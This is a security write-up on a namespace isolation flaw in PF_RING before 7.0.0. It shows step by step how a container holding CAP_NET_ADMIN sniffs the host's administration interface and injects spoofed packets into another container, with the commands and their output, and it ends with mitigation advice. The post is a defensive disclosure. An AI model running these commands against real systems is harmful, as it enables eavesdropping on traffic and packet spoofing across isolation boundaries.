Breaking namespace isolation with PF_RING before 7.0.0
We recently helped a client to design a secure network appliance that involve sniffing network traffic. This device has high security and performance constraints.
This post is a feedback on the unlikely integration of fast sniffers with linux containers.
Context
Let's consider a network appliance running Linux that use PF_RING
to lift packets from the NIC and feed those to sniffers isolated in containers.
PF_RING
is a faster alternative to classic RAW socket sniffing. In a nutshell, packets coming from the NIC driver are put in a circular buffer without any processing. The sniffer then mmap()
the buffer in userspace to access network packets.
Considering the security hardening requirements of the appliance, the sniffer should be as isolated as possible. Isolation should have as little of a performance impact as possible. Containers are a pretty good fit for this use case.
Before version 7.0.0 (the very last one as of this writing), PF_RING
didn't support network namespaces. The only solution for the sniffers to access the circular packet buffer was to grant the CAP_NET_ADMIN
capability. Granting that capability for a "normal" hardened container isn't great but with PF_RING
it's worse...
Example architecture
Consider the following design for a dummy network sniffer:
To quickly troubleshoot things, all containers are fully-fledge Ubuntu distributions. In a real-life scenario the ids-container
would be super minimal and hardened. LxC v2 is used but the setup could be replicated with the container provider of your choice.
The host system has 2 network interfaces:
- administration is performed on the secure LAN
if-admin
- sniffing is possible on the interface
if-sniff
root@host:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff
inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin
valid_lft forever preferred_lft forever
inet6 fe80::5054:ff:fe4c:97df/64 scope link
valid_lft forever preferred_lft forever
3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff
inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff
valid_lft forever preferred_lft forever
inet6 fe80::2022:22ff:fe22:2222/64 scope link
valid_lft forever preferred_lft forever
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.1/24 brd 192.168.0.255 scope global br0
valid_lft forever preferred_lft forever
inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link
valid_lft forever preferred_lft forever
6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000
link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link
valid_lft forever preferred_lft forever
root@host:~# ls -l /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 14:40 /proc/self/ns/net -> net:[4026531957]
veth89U9YK@if5
is the virtual interface pair device of internet0
in app_container
.
app-container
only exposes sensitive services on the interface if-admin
:
root@app-container:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0
valid_lft forever preferred_lft forever
inet6 fe80::216:1ff:fe54:9a34/64 scope link
valid_lft forever preferred_lft forever
root@app-container:~# ls -al /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May 4 12:48 /proc/self/ns/net -> net:[4026532250]
root@app-container:~# ss -tan
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 5 192.168.0.2:8080 *:*
# The exposed service is reachable by the administrator
admin@it:~$ curl 192.168.122.221
Hello Admin
ids-container
does not have any interface configured as it accesses if-sniff
through PF_RING
with CAP_NET_ADMIN
:
root@ids-container:~# ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@ids-container:~# ls /sys/class/net/
lo
root@ids-container:~# grep ^Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 0000000000001000
CapEff: 0000000000001000
CapBnd: 0000000000001000
CapAmb: 0000000000000000
root@ids-container:~# capsh --decode=0000000000001000
0x0000000000001000=cap_net_admin
root@ids-container:~# ls -ls /proc/self/ns/net
0 lrwxrwxrwx 1 root root 0 May 4 12:52 /proc/self/ns/net -> net:[4026532310]
Communication between app-container
and ids-container
is not represented but let's say it's a channel not based on the networking stack.
On the host, the PF_RING
kernel module is loaded with the default configuration and network interfaces are correctly detected:
root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko
root@host:~# grep -r . /sys/module/pf_ring/parameters/*
/sys/module/pf_ring/parameters/enable_debug:0
/sys/module/pf_ring/parameters/enable_frag_coherence:1
/sys/module/pf_ring/parameters/enable_ip_defrag:0
/sys/module/pf_ring/parameters/enable_tx_capture:1
/sys/module/pf_ring/parameters/force_ring_lock:0
/sys/module/pf_ring/parameters/min_num_slots:4096
/sys/module/pf_ring/parameters/perfect_rules_hash_size:4096
/sys/module/pf_ring/parameters/quick_mode:0
/sys/module/pf_ring/parameters/transparent_mode:0
root@host:~# cat /proc/net/pf_ring/info
PF_RING Version : 6.6.0 (unknown)
Total rings : 0
Standard (non ZC) Options
Ring slots : 4096
Slot version : 16
Capture TX : Yes [RX+TX]
IP Defragment : No
Socket Mode : Standard
Cluster Fragment Queue : 0
Cluster Fragment Discard : 0
root@host:~# ls -1 /proc/net/pf_ring/dev/
br0 if-admin if-sniff internet0 vethLXOGMB
Breaking namespace isolation
Everything looks good, we can sniff on the interface if-sniff
inside the ids-container
.
root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff
Capturing from if-sniff
[...]
=========================
Absolute Stats: [7 pkts rcvd][0 pkts dropped]
Total Pkts=7/Dropped=0.0 %
7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec]
=========================
Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec]
=========================
This looks good, until you try to sniff the interface any
from within the ids-container
... and get the packets of if-admin
.
root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80'
Capturing from any
[...]
14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
# GET / HTTP/1.1\r\nHost: 192.168.122.221\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n
[...]
14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172]
52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A
# Server: BaseHTTP/0.3 Python/2.7.6\r\nDate: Fri, 04 May 2018 13:33:45 GMT\r\nContent-type: application/text\r\n\r\nHello Admin\n'
[...]
Indeed, any
should correspond to all interfaces available in the network namespace. However this version of PF_RING
doesn't support namespace isolation, so you get access to all of the host network interfaces. Effectively breaking the isolation.
Sniffing on one of the host network interface is also possible:
root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80'
Capturing from if-admin
14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07
[...]
Slight complication, accessing the host interfaces list from the container isn't possible. The pfring_findalldevs()
function in the userland library ends up using the results from pfring_mod_findalldevs()
which extracts the interfaces' names from /proc/net/pf_ring/dev/<iface>/info
. Unless the LxC configuration explicitly mounts this path to the container, which should never happen, some interface name guessing is needed. A light bruteforce is required for systems with systemd udev version >= 197.
Loading the PF_RING
module with default configuration also allows for writing packets to network interfaces.
root@host:~# grep TX /proc/net/pf_ring/info
Capture TX : Yes [RX+TX]
To prove injecting an arbitrary packet from ids-container
to app-container
through PF_RING
, a pcap of a simple UDP connection is captured and later injected:
# Captured packet to inject
root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap
reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet)
16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5
0x0000: 5254 004c 97df 5254 0038 2d01 0800 4500 RT.L..RT.8-...E.
0x0010: 0021 2982 4000 4011 9b1a c0a8 7a01 c0a8 .!).@.@.....z...
0x0020: 7add d3cb 04d2 000d 764e 4142 4344 0a z.......vNABCD.
root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z
Sending packets on internet0
Using PF_RING v.6.6.0
Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs = 0 ticks@0hz from beginning]
Read 1 packets from pcap file /UDP_test_packet.pcap
Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16
[0] pfring_send(47) returned 47
TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts]
Sent 1 packets
# In `app-container`, the forged packet is received
root@app-container:/# tcpdump -vv -n -i internet0 -XX
tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33)
192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5
0x0000: 0016 013b aaa7 5254 0038 2d01 0800 4500 ...;..RT.8-...E.
0x0010: 0021 2982 4000 4011 8ff4 c0a8 0003 c0a8 .!).@.@.........
0x0020: 0002 d3cb 04d2 000d 175a 4142 4344 0a .........ZABCD.
Mitigation
Make the change to version 7.0.0 of PF_RING
, this last version patches the namespace isolation problem and introduce capture interface white-listing. Proper configuration of the kernel module and host+container hardening can be used to reduce the risk if upgrading is not a possibility.
Additionnally, "Capture TX" should be disabled if your sniffer don't use it.
root@host:~# insmod ./pf_ring.ko enable_tx_capture=0
Conclusion
We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:
- Monitor the administration network interface
- Inject traffic to any network interface
- Route packets between all network interfaces
- Exfiltrate sniffed packets back to the attacker
The thing to remember here is that PF_RING
is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)
Performance and security are not always such good friends.